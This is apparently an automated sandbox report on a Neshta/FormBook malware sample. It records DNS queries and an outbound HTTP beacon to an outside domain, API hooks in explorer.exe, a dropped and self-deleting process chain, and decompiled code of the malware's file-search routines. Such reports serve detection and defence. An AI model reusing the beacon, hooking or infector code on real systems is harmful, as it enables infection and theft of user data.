                                                                                                                        Jun 10, 2021 20:54:57.021190882 CEST8.8.8.8192.168.2.60x2681No error (0)www.agileintelligence.coachagileintelligence.coachCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 10, 2021 20:54:57.021190882 CEST8.8.8.8192.168.2.60x2681No error (0)agileintelligence.coach34.102.136.180A (IP address)IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • www.agileintelligence.coach

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.2.64975334.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 10, 2021 20:54:57.072968960 CEST5532OUTGET /xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ== HTTP/1.1
                                                                                                                        Host: www.agileintelligence.coach
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 10, 2021 20:54:57.211914062 CEST5533INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Thu, 10 Jun 2021 18:54:57 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60ba413e-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Code Manipulations

                                                                                                                        User Modules

                                                                                                                        Hook Summary

                                                                                                                        Function NameHook TypeActive in Processes
                                                                                                                        PeekMessageAINLINEexplorer.exe
                                                                                                                        PeekMessageWINLINEexplorer.exe
                                                                                                                        GetMessageWINLINEexplorer.exe
                                                                                                                        GetMessageAINLINEexplorer.exe

                                                                                                                        Processes

                                                                                                                        Process: explorer.exe, Module: user32.dll
                                                                                                                        Function NameHook TypeNew Data
                                                                                                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEB
                                                                                                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                                                                                        GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                                                                                        GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEB

                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Click to jump to process

                                                                                                                        Memory Usage

                                                                                                                        Click to jump to process

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        Analysis Process: vi0EwpbUht.exe PID: 7096 Parent PID: 6088

                                                                                                                        General

                                                                                                                        Start time:20:53:02
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\vi0EwpbUht.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:284661 bytes
                                                                                                                        MD5 hash:F478C15F5AFFD8359762B8C6B0E913A4
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: vi0EwpbUht.exe PID: 6184 Parent PID: 7096

                                                                                                                        General

                                                                                                                        Start time:20:53:04
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:243189 bytes
                                                                                                                        MD5 hash:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: vi0EwpbUht.exe PID: 6372 Parent PID: 6184

                                                                                                                        General

                                                                                                                        Start time:20:53:05
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:243189 bytes
                                                                                                                        MD5 hash:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: explorer.exe PID: 3440 Parent PID: 6372

                                                                                                                        General

                                                                                                                        Start time:20:53:11
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:
                                                                                                                        Imagebase:0x7ff6f22f0000
                                                                                                                        File size:3933184 bytes
                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: svchost.com PID: 3728 Parent PID: 3440

                                                                                                                        General

                                                                                                                        Start time:20:53:16
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\svchost.com
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Windows\svchost.com' 'C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:41472 bytes
                                                                                                                        MD5 hash:713C9023AF9454658983BDEEC3B3F4D4
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: SUSP_GIF_Anomalies, Description: Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, Source: 00000005.00000003.395354644.00000000021C4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Windows\svchost.com, Author: Florian Roth
                                                                                                                        Reputation:low

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: elxhan.exe PID: 1144 Parent PID: 3728

                                                                                                                        General

                                                                                                                        Start time:20:53:17
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:243189 bytes
                                                                                                                        MD5 hash:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: elxhan.exe PID: 5572 Parent PID: 1144

                                                                                                                        General

                                                                                                                        Start time:20:53:21
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:243189 bytes
                                                                                                                        MD5 hash:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: NETSTAT.EXE PID: 5948 Parent PID: 3440

                                                                                                                        General

                                                                                                                        Start time:20:54:05
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                        Imagebase:0xe0000
                                                                                                                        File size:32768 bytes
                                                                                                                        MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:moderate

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: cmd.exe PID: 4140 Parent PID: 5948

                                                                                                                        General

                                                                                                                        Start time:20:54:10
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:/c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
                                                                                                                        Imagebase:0x2a0000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: conhost.exe PID: 4592 Parent PID: 4140

                                                                                                                        General

                                                                                                                        Start time:20:54:11
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff61de10000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: help.exe PID: 5944 Parent PID: 3440

                                                                                                                        General

                                                                                                                        Start time:20:54:47
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\help.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                                        Imagebase:0x10a0000
                                                                                                                        File size:10240 bytes
                                                                                                                        MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:moderate

                                                                                                                        Chronological Activities

                                                                                                                        Disassembly

                                                                                                                        Code Analysis

                                                                                                                        Reset < >

                                                                                                                          Analysis Process: vi0EwpbUht.exe PID: 7096 Parent PID: 6088 vi0EwpbUht.exeCOMMON

                                                                                                                          Executed Functions

                                                                                                                          Function 00405634, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E00405634(void* __eax, intOrPtr __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v292;
				char _v336;
				void* __ebx;
				void* __edi;
				void* __ebp;
				CHAR* _t38;
				void* _t39;
				int _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t60;
				void* _t63;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				struct _WIN32_FIND_DATAA* _t87;

				_t85 = __esi;
				_t70 = __edx;
				_t61 = __ecx;
				_t60 = __eax;
				asm("pushad");
				E004052D8(__eax);
				 *((intOrPtr*)(_t60 + 0x18)) = E0040456C();
				asm("popad");
				asm("pushad");
				_t2 = _t60 + 0x1c; // 0x1c
				E004030E8(_t2, _t70);
				asm("popad");
				if( *((intOrPtr*)(_t60 + 0x1c)) != 0) {
					asm("pushad");
					_t4 = _t60 + 0x1c; // 0x1c
					E00404DB8( *_t4, _t4);
					_t32 =  *((intOrPtr*)(_t60 + 0x20));
					if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
						_t56 = E00405C80();
						 *((intOrPtr*)(_t60 + 0x20)) = _t56;
						asm("popad");
						asm("pushad");
						_t57 = _t61;
						_t61 = _t56;
						_t58 = E004048D8(_t57, _t56, 0x40569b);
						_t82 = _t61;
						if(_t58 == 0) {
							_t82 = E004056A7;
						}
						_t32 = E00405CAC( *((intOrPtr*)(_t60 + 0x20)), _t82);
					}
					asm("popad");
					_t87 = _t86 + 0xfffffec0;
					_push(0);
					_push(0);
					E00405300(_t61, _t60, _t32, _t87, _t83, _t85);
					_pop(_t63);
					E00403258( &_v336, _t63,  *((intOrPtr*)(_t60 + 0x1c)));
					E004044A8();
					_t38 = _t63;
					_push(_t38);
					_t39 = FindFirstFileA(_t38, _t87); // executed
					_t84 = _t39;
					asm("pushfd");
					E00403094(_t87);
					asm("popfd");
					if(_t39 + 1 != 0) {
						do {
							if(E0040536C(_t60, _t60, _v336,  &_v292, _t84, _t85, _a4) != 0) {
								asm("jecxz 0x16");
								 *((intOrPtr*)(_t60 + 0x24))(_t87, 1);
								asm("jecxz 0x22");
								asm("loop 0x31");
								_push(E00402448(0x140));
								E004045E8( *((intOrPtr*)(_t60 + 0x18)), _t50);
								_pop(_t80);
								_t69 = 0x140;
								E0040254C(_t87, _t69, _t80);
							}
							_t45 = FindNextFileA(_t84, _t87); // executed
						} while (_t45 != 0);
						FindClose(_t84); // executed
					}
				}
				 *((intOrPtr*)(_t60 + 0x20)) = 0;
				return E00404520( *((intOrPtr*)(_t60 + 0x20)));
			}

























                                                                                                                          0x00405634
                                                                                                                          0x00405634
                                                                                                                          0x00405634
                                                                                                                          0x00405639
                                                                                                                          0x0040563b
                                                                                                                          0x0040563c
                                                                                                                          0x00405646
                                                                                                                          0x00405649
                                                                                                                          0x0040564a
                                                                                                                          0x0040564b
                                                                                                                          0x0040564e
                                                                                                                          0x00405653
                                                                                                                          0x00405659
                                                                                                                          0x0040565f
                                                                                                                          0x00405660
                                                                                                                          0x00405665
                                                                                                                          0x0040566a
                                                                                                                          0x0040566f
                                                                                                                          0x00405671
                                                                                                                          0x00405676
                                                                                                                          0x00405679
                                                                                                                          0x0040567a
                                                                                                                          0x0040567c
                                                                                                                          0x0040567c
                                                                                                                          0x00405682
                                                                                                                          0x00405689
                                                                                                                          0x0040568a
                                                                                                                          0x0040568c
                                                                                                                          0x0040568c
                                                                                                                          0x00405694
                                                                                                                          0x00405694
                                                                                                                          0x004056a9
                                                                                                                          0x004056aa
                                                                                                                          0x004056b2
                                                                                                                          0x004056b3
                                                                                                                          0x004056b7
                                                                                                                          0x004056c3
                                                                                                                          0x004056c5
                                                                                                                          0x004056ca
                                                                                                                          0x004056cf
                                                                                                                          0x004056d2
                                                                                                                          0x004056d5
                                                                                                                          0x004056da
                                                                                                                          0x004056df
                                                                                                                          0x004056e0
                                                                                                                          0x004056e5
                                                                                                                          0x004056e7
                                                                                                                          0x004056e9
                                                                                                                          0x004056fc
                                                                                                                          0x00405701
                                                                                                                          0x0040570f
                                                                                                                          0x00405713
                                                                                                                          0x00405715
                                                                                                                          0x00405722
                                                                                                                          0x00405727
                                                                                                                          0x0040572c
                                                                                                                          0x0040572d
                                                                                                                          0x00405730
                                                                                                                          0x00405730
                                                                                                                          0x00405737
                                                                                                                          0x0040573c
                                                                                                                          0x00405741
                                                                                                                          0x00405741
                                                                                                                          0x00405746
                                                                                                                          0x0040574e
                                                                                                                          0x00405759

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 3541575487-438819550
                                                                                                                          • Opcode ID: 7c3ae3db1d7091c66810d0afebbe5bbb80646222bcf65a163e226210ed7e34e0
                                                                                                                          • Instruction ID: e0bf5d45d2763b4aada85c2368977cee553341535aa4efecd7ed3e039fa03a50
                                                                                                                          • Opcode Fuzzy Hash: 7c3ae3db1d7091c66810d0afebbe5bbb80646222bcf65a163e226210ed7e34e0
                                                                                                                          • Instruction Fuzzy Hash: 513188B53005006BD705BF26998295B3799DFC5328B60847FB904EB2C7EA7DDC018E99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405080, Relevance: 4.6, APIs: 3, Instructions: 100fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 71%
                                                                                                                          			E00405080(char __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				struct _WIN32_FIND_DATAA _v336;
				char _v340;
				char _v344;
				signed int _t50;
				signed int _t51;
				int _t53;
				intOrPtr* _t76;
				intOrPtr _t85;
				void* _t96;
				void* _t99;

				_v344 = 0;
				_v340 = 0;
				_v16 = 0;
				_t76 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E004033FC(_v8);
				E004033FC(_v12);
				_push(_t99);
				_push(0x4051db);
				_push( *[fs:eax]);
				 *[fs:eax] = _t99 + 0xfffffeac;
				E00403094(__ecx);
				if(_v8 != 0 &&  *((char*)(_v8 + E0040320C(_v8) - 1)) != 0x5c) {
					E00403214( &_v8, 0x4051f0);
				}
				if(_v12 != 0 &&  *_v12 == 0x5c) {
					E00404728(_v12,  &_v340, 2);
					E0040312C( &_v12, _v340);
				}
				E00403258( &_v16, _v12, _v8);
				_t50 = FindFirstFileA(E0040340C(_v16),  &_v336); // executed
				_t96 = _t50;
				_t51 = _t50 & 0xffffff00 | _t96 != 0x00000000;
				while(_t51 != 0) {
					if((_v336.dwFileAttributes & 0x00000010) <= 0) {
						if( *_t76 != 0) {
							E00403214(_t76, E004051FC);
						}
						_push( *_t76);
						_push(_v8);
						E004031F4( &_v344, 0x104,  &(_v336.cFileName));
						_push(_v344);
						E004032CC();
					}
					_t53 = FindNextFileA(_t96,  &_v336); // executed
					asm("sbb eax, eax");
					_t51 = _t53 + 1;
				}
				FindClose(_t96); // executed
				_pop(_t85);
				 *[fs:eax] = _t85;
				_push(E004051E2);
				E004030B8( &_v344, 2);
				return E004030B8( &_v16, 3);
			}
















                                                                                                                          0x0040508d
                                                                                                                          0x00405093
                                                                                                                          0x00405099
                                                                                                                          0x0040509c
                                                                                                                          0x0040509e
                                                                                                                          0x004050a1
                                                                                                                          0x004050a7
                                                                                                                          0x004050af
                                                                                                                          0x004050b6
                                                                                                                          0x004050b7
                                                                                                                          0x004050bc
                                                                                                                          0x004050bf
                                                                                                                          0x004050c4
                                                                                                                          0x004050cd
                                                                                                                          0x004050e9
                                                                                                                          0x004050e9
                                                                                                                          0x004050f2
                                                                                                                          0x0040510a
                                                                                                                          0x00405118
                                                                                                                          0x00405118
                                                                                                                          0x00405126
                                                                                                                          0x0040513b
                                                                                                                          0x00405140
                                                                                                                          0x00405144
                                                                                                                          0x004051a6
                                                                                                                          0x00405153
                                                                                                                          0x00405158
                                                                                                                          0x00405161
                                                                                                                          0x00405161
                                                                                                                          0x00405166
                                                                                                                          0x00405168
                                                                                                                          0x0040517c
                                                                                                                          0x00405181
                                                                                                                          0x0040518e
                                                                                                                          0x0040518e
                                                                                                                          0x0040519b
